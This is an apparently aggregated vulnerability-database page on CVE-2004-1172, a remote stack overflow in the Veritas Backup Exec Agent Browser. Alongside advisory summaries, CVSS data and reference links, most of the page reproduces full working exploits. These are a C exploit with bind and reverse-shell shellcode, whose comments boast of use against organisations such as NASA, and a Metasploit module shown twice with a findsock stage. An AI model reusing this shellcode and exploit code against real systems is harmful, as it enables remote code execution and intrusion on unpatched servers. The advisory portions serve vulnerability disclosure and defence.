CVE-2004-1172
CVSS 10.0
Published: 2005-01-10 00:00:00
Revised: 2008-09-05 16:40:35

[Original] Stack-based buffer overflow in the Agent Browser in Veritas Backup Exec 8.x before 8.60.3878 Hotfix 68, and 9.x before 9.1.4691 Hotfix 40, allows remote attackers to execute arbitrary code via a registration request with a long hostname.


[CNNVD] Symantec Veritas Backup Exec Agent Browser buffer overflow vulnerability (CNNVD-200501-208)

        Veritas Backup Exec is a backup and recovery solution.
        A stack overflow vulnerability exists in the Agent Browser of Veritas Backup Exec 8.x before 8.60.3878 Hotfix 68 and 9.x before 9.1.4691 Hotfix 40.
        A remote attacker can exploit this vulnerability through a registration request carrying an overly long hostname to execute arbitrary code.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:symantec_veritas:backup_exec:9.0
cpe:/a:symantec_veritas:backup_exec:8.0
cpe:/a:symantec_veritas:backup_exec:9.1
cpe:/a:symantec_veritas:backup_exec:8.5
cpe:/a:symantec_veritas:backup_exec:8.6

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1172
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1172
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-208
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/907729
(UNKNOWN)  CERT-VN  VU#907729
http://www.securityfocus.com/bid/11974
(VENDOR_ADVISORY)  BID  11974
http://xforce.iss.net/xforce/xfdb/18506
(UNKNOWN)  XF  netbackup-agent-browser-bo(18506)
http://www.idefense.com/application/poi/display?id=169
(UNKNOWN)  IDEFENSE  20041216 Veritas Backup Exec Agent Browser Registration Request Buffer Overflow Vulnerability
http://www.frsirt.com/exploits/20050111.101_BXEC.cpp.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20050111.101_BXEC.cpp.php
http://seer.support.veritas.com/docs/273850.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273850.htm
http://seer.support.veritas.com/docs/273422.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273422.htm
http://seer.support.veritas.com/docs/273420.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273420.htm
http://seer.support.veritas.com/docs/273419.htm
(UNKNOWN)  CONFIRM  http://seer.support.veritas.com/docs/273419.htm
http://secunia.com/advisories/13495/
(UNKNOWN)  SECUNIA  13495

- Vulnerability information

Symantec Veritas Backup Exec Agent Browser buffer overflow vulnerability
Critical  Buffer overflow
2005-01-10 00:00:00 2006-03-27 00:00:00
Remote
        Veritas Backup Exec is a backup and recovery solution.
        A stack overflow vulnerability exists in the Agent Browser of Veritas Backup Exec 8.x before 8.60.3878 Hotfix 68 and 9.x before 9.1.4691 Hotfix 40.
        A remote attacker can exploit this vulnerability through a registration request carrying an overly long hostname to execute arbitrary code.

- Advisory and patches

        The vendor has released an upgrade patch that fixes this security issue; the patch is available at:
        http://seer.support.veritas.com/docs/273419.htm

- Vulnerability information (750)

Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version) (EDBID:750)
windows remote
2005-01-11 Verified
6101 class101
/* Got to give it to class101 on this one.  
 * Tested and penetrated. / str0ke 
 */

/*
VERITAS Backup Exec v9.1.4691.SP1
                    v9.1.4691.SP0
     v8.5.3572
Agent Browser Service, Remote Stack Overflow
 
Highly Critical
 
All credits to:
 
-iDEFENSE(discovery-www.iDEFENSE.com),
-Thor Doomen(iat-syscall[at]inbox.lv),
-H.D. Moore(scode-www.metasploit.com),
-Matt Miller(scode-www.hick.org)
 
ExtraNotes:
 
All my tests/debugs where a bit long (some days) firstly due to the big size
of Backup Exec and the unstability accross differents windows versions
to make working that IAT method with 100% success and the difficulty to debug it.
(As a recall, due to the 60 bytes only free, a tiny shellcode is send in first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanx syscall. Let's think large now. Imagine that you exploits the hole and you submit
the shellcode 5 minutes later, the service will hang on to death of course until a kill,
now imagine that you exploits the hole and you submit the shellcode too faslty for the,
computer processing, the shellcode can be missed, wont be executed again, sometimes yes/no, but really unstable.
Hopefully (or unfortunely for you admin :>) I'm here to optimize it and make it 100% working, universal,
stable whatever you want for the good fortune of script kiddies and to show what mean working to my good
friends ka-odick :>
                                                 Tries
   Machine           Bind  / Rverse / Success
 
 (2x) Win2k SP4   Server English      10        10       20
 (1x) Win2k SP4   Pro    English       5         5       10
 (1x) WinXP SP1   Pro    English       5         5       10
 (1x) WinXP SP1a  Pro    English       5         5       10
 (3x) Win2003 SP0 Server English       5         5       10
 (1x) Win2003 SP0 Server Ita.          5         5       10
 (1x) NT4         Server English.      5         5       10
 
            = Universal
 
v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable to not say not working when used,
made some changes.
 
v0.2:
fix of the first big problem , the missed shellcode accross differents windows,
fixed by flooding benetns with more sends, timer really small, this is important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.
 
v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.
 
v0.4:
As a warning, this poc v0.4 as been tested working by an anonymous tester (never mentionned there)
on some organisations such nasa, states/edus, it's urgent to update 1 month after the advisory, sleepers.
 
Tips: -make sure that your ip is safe of null bytes in reverse mode.
      -make sure that you targets the good version of Backup Exec,
      else you crash it.
   -Backup Exec v10.0 is now available, get it at www.veritas.com.
   -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
   for an urgent update. (extracted from the hotfix at www.veritas.com)
      Backup Exec 9.x is tested safe after replacing the .exe
 
Greetings:
   Nima Majidi
   Behrang Fouladi
   Pejman
   keystr0ke
   JGS
   DiabloHorn
   kimatrix
   NaV
   New Metasploit v2.3 (http://www.metasploit.com/)
   and all idlers of #n3ws on Eris Free Network.
 
by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not persian and you don't care where I come from.
 
04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
 
char scode1[]=
//file://Matt Millers 'skape' shellcode.
"\x90"  // pad needed their for me, if you get scode detection problems on slow connections,
//file://try to add more NOP and make sure to update the memcpys later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 

char scode2[]=
//file://HD.Moore Shellcode
//file://"\x90"   uncomment this if you have scode detection problem on slows connections or try more NOP,
//file://but for me and some other guys its already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90"; 
 
static char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
char v85[]="\xFF\x38\x11\x40";
char esiold[]="\xB9\x08\x43\x01";
 
char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";
 
#ifdef WIN32
 WSADATA wsadata;
#endif
 
void ver();
void usage(char* us);
 
int main(int argc,char *argv[])
{
 ver();
 unsigned long gip;
 unsigned short gport;
 char *os;
 if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;} 
 if (argc==5){usage(argv[0]);return -1;} 
    if (strlen(argv[2])<7){usage(argv[0]);return -1;} 
    if (argc==6)
 {
        if (strlen(argv[4])<7){usage(argv[0]);return -1;} 
 }
#ifndef WIN32
 if (argc==6)
 {
   gip=inet_addr(argv[4])^(long)0x00000000;
  gport=htons(atoi(argv[5]))^(short)0x0000;
 }
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
 if (argc==6)
 {
  gip=inet_addr(argv[4])^(ULONG)0x00000000;
  gport=htons(atoi(argv[5]))^(USHORT)0x0000;
 }
#endif
 int ip=htonl(inet_addr(argv[2])), port;
 if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
 SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);
 if (s==-1){printf("[+] socket() error\n");return -1;} 
 if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+]            Backup Exec v9.1.4691.0";}
 else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
 if (argc==6)
 {
  memcpy(&scode1[282], &gip, 4);
  memcpy(&scode1[289], &gport, 2);
  strcat(payload,scode1);
 }
 else strcat(payload,scode2);
 printf("[+] target(s): %s\n",os);   
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 connect(s,( struct sockaddr *)&server,sizeof(server));
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
  case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {
   printf("[+] connected, constructing the payload...\n");
   if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
 
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}
 
#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
#ifdef WIN32
   Sleep(1000);
#else
   Sleep(1);
#endif   
   printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);   
   printf("[+] payload sent.\n");
   return 0;
  }
 }
 closesocket(s);
#ifdef WIN32
 WSACleanup();
#endif
 return 0;
}
 

void usage(char* us)
{ 
 printf("USAGE:\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP VulnPORT\n");
 printf("      [+]  . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
 printf("VERSION:                               \n");
 printf("      [+] 1. Backup Exec v9.1.4691.SP1\n");
 printf("      [+] 1. Backup Exec v9.1.4691.SP0\n");
 printf("      [+] 2. Backup Exec v8.5.3572\n");
 printf("TARGET:                               \n");
 printf("      [+]  . 2k3/2k/XP/NT4 universal (*)\n");
 printf("NOTE:                               \n");
 printf("      The exploit bind a cmdshell port 101 or\n");
 printf("      reverse a cmdshell on your listener.\n");
 printf("      A wildcard (*) mean tested working.\n");
 printf("      Compilation msvc6, cygwin, Linux.\n");
 return;
}
void ver()
{ 
 printf("                                                                   \n");
 printf("        ================================================[0.4]========\n");
 printf("        =================VERITAS Backup Exec 8.x/9.x=================\n");
 printf("        =========Agent Browser Service, Remote Stack Overflow========\n");
 printf("        ======coded by class101=============[Hat-Squad.com 2005]=====\n");
 printf("        =============================================================\n");
 printf("                                                                   \n");
}

// milw0rm.com [2005-01-11]
		

- Vulnerability information (16331)

Veritas Backup Exec Name Service Overflow (EDBID:16331)
windows remote
2010-06-22 Verified
0 metasploit
##
# $Id: name_service.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Veritas Backup Exec Name Service Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the Veritas Backup
				Exec Agent Browser service. This vulnerability occurs when a
				recv() call has a length value too long for the	destination
				stack buffer. By sending an agent name value of 63 bytes or
				more, we can overwrite the return address of the recv
				function. Since we only have ~60 bytes of contiguous space
				for shellcode, a tiny findsock payload is sent which uses a
				hardcoded IAT address for the recv() function. This payload
				will then roll the stack back to the beginning of the page,
				recv() the real shellcode into it, and jump to it. This
				module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
				8.6.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-1172'],
					[ 'OSVDB', '12418'],
					[ 'BID', '11974'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'MinNops'  => 512,
					'MinNops'  => 512,
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
						{
							'Platform' => 'win',
							'Rets'     => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
						},
					],
					[
						'Veritas BE 8.5',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
						},
					],
				],
			'DisclosureDate' => 'Dec 16 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6101)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
		# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
		# nulls: [0x00401150 -> 0x401150FF]
		stage_code = "\xfc" * 112
		stage_read =
			"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
			"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
			"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

		# Configure the IAT for the recv call
		stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

		# Stuff it all into one request
		stage_code[2, stage_read.length] = stage_read

		# Create the registration request
		req =
			"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
			"1.1.1.1.1.1\x00" + "\xeb\x81"

		print_status("Sending the agent registration request of #{req.length} bytes...")
		sock.put(req)

		print_status("Sending the payload stage down the socket...")
		sock.put(payload.encoded)

		print_status("Waiting for the payload to execute...")
		select(nil,nil,nil,2)

		handler
		disconnect
	end

end


__END__
[ findsock stage ]
00000000  31F6              xor esi,esi
00000002  C1EC0C            shr esp,0xc
00000005  C1E40C            shl esp,0xc
00000008  89E7              mov edi,esp
0000000A  89FB              mov ebx,edi
0000000C  6A01              push byte +0x1
0000000E  8B7424FE          mov esi,[esp-0x2]
00000012  31D2              xor edx,edx
00000014  52                push edx
00000015  42                inc edx
00000016  C1E210            shl edx,0x10
00000019  52                push edx
0000001A  57                push edi
0000001B  56                push esi
0000001C  B8FF501140        mov eax,0x401150ff
00000021  C1E808            shr eax,0x8
00000024  FF10              call near [eax]
00000026  85C0              test eax,eax
00000028  7907              jns 0x31
0000002A  89DC              mov esp,ebx
0000002C  4E                dec esi
0000002D  85F6              test esi,esi
0000002F  75E1              jnz 0x12
00000031  FFD7              call edi
		

- Vulnerability information (F83019)

Veritas Backup Exec Name Service Overflow (PacketStormID:F83019)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,shellcode
CVE-2004-1172

This Metasploit module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This Metasploit module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Veritas Backup Exec Name Service Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the Veritas Backup
				Exec Agent Browser service. This vulnerability occurs when a
				recv() call has a length value too long for the	destination
				stack buffer. By sending an agent name value of 63 bytes or
				more, we can overwrite the return address of the recv
				function. Since we only have ~60 bytes of contiguous space
				for shellcode, a tiny findsock payload is sent which uses a
				hardcoded IAT address for the recv() function. This payload
				will then roll the stack back to the beginning of the page,
				recv() the real shellcode into it, and jump to it. This
				module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
				8.6.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1172'],
					[ 'OSVDB', '12418'],
					[ 'BID', '11974'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'MinNops'  => 512,
					'MinNops'  => 512,
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
						{
							'Platform' => 'win',
							'Rets'     => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
						},
					],
					[ 
						'Veritas BE 8.5',
						{
							'Platform' => 'win',
							'Rets'     => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
						},
					],					
				],
			'DisclosureDate' => 'Dec 16 2004',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6101)
				], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
		# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
		# nulls: [0x00401150 -> 0x401150FF]
		stage_code = "\xfc" * 112
		stage_read = 
			"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
			"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
			"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
	
		# Configure the IAT for the recv call
		stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
		
		# Stuff it all into one request
		stage_code[2, stage_read.length] = stage_read
		
		# Create the registration request
		req =  
			"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
			"1.1.1.1.1.1\x00" + "\xeb\x81"
	  	
		print_status("Sending the agent registration request of #{req.length} bytes...")
		sock.put(req)
		
		print_status("Sending the payload stage down the socket...")
		sock.put(payload.encoded)

		print_status("Waiting for the payload to execute...")		
		sleep(2)
		
		handler
		disconnect
	end

end
	

__END__
[ findsock stage ]
00000000  31F6              xor esi,esi
00000002  C1EC0C            shr esp,0xc
00000005  C1E40C            shl esp,0xc
00000008  89E7              mov edi,esp
0000000A  89FB              mov ebx,edi
0000000C  6A01              push byte +0x1
0000000E  8B7424FE          mov esi,[esp-0x2]
00000012  31D2              xor edx,edx
00000014  52                push edx
00000015  42                inc edx
00000016  C1E210            shl edx,0x10
00000019  52                push edx
0000001A  57                push edi
0000001B  56                push esi
0000001C  B8FF501140        mov eax,0x401150ff
00000021  C1E808            shr eax,0x8
00000024  FF10              call near [eax]
00000026  85C0              test eax,eax
00000028  7907              jns 0x31
0000002A  89DC              mov esp,ebx
0000002C  4E                dec esi
0000002D  85F6              test esi,esi
0000002F  75E1              jnz 0x12
00000031  FFD7              call edi
    

- Vulnerability information (F35676)

veritasABS.c (PacketStormID:F35676)
2005-01-12 00:00:00
class101  
exploit,remote,overflow,shell
CVE-2004-1172

Remote stack overflow exploit for Veritas Backup Exec. Works for versions 9.1.4691.SP1, 9.1.4691.SP0, and 8.5.3572. Allows for a shell to be bound to port 101, or it can spawn a reverse shell as well.

- Vulnerability information (F35380)

iDEFENSE Security Advisory 2004-12-16.5 (PacketStormID:F35380)
2004-12-30 00:00:00
Patrik Karlsson,iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary,tcp
CVE-2004-1172

iDEFENSE Security Advisory 12.16.2004-5 - Remote exploitation of a stack-based buffer overflow vulnerability in Veritas Backup Exec allows attackers to execute arbitrary code. The vulnerability specifically exists within the function responsible for receiving and parsing registration requests. The registration request packet contains the hostname and connecting TCP port of the client which is stored in an array on the stack. An attacker can send a registration request with an overly long hostname value to overflow the array and take control of the saved return address to execute arbitrary code.

Veritas Backup Exec Agent Browser Registration Request Buffer Overflow
Vulnerability

iDEFENSE Security Advisory 12.16.04
http://www.idefense.com/application/poi/display?id=169
December 16, 2004

I. BACKGROUND

Backup Exec is a next generation backup and restore solution for
Microsoft Windows server environments. More information is available
here:

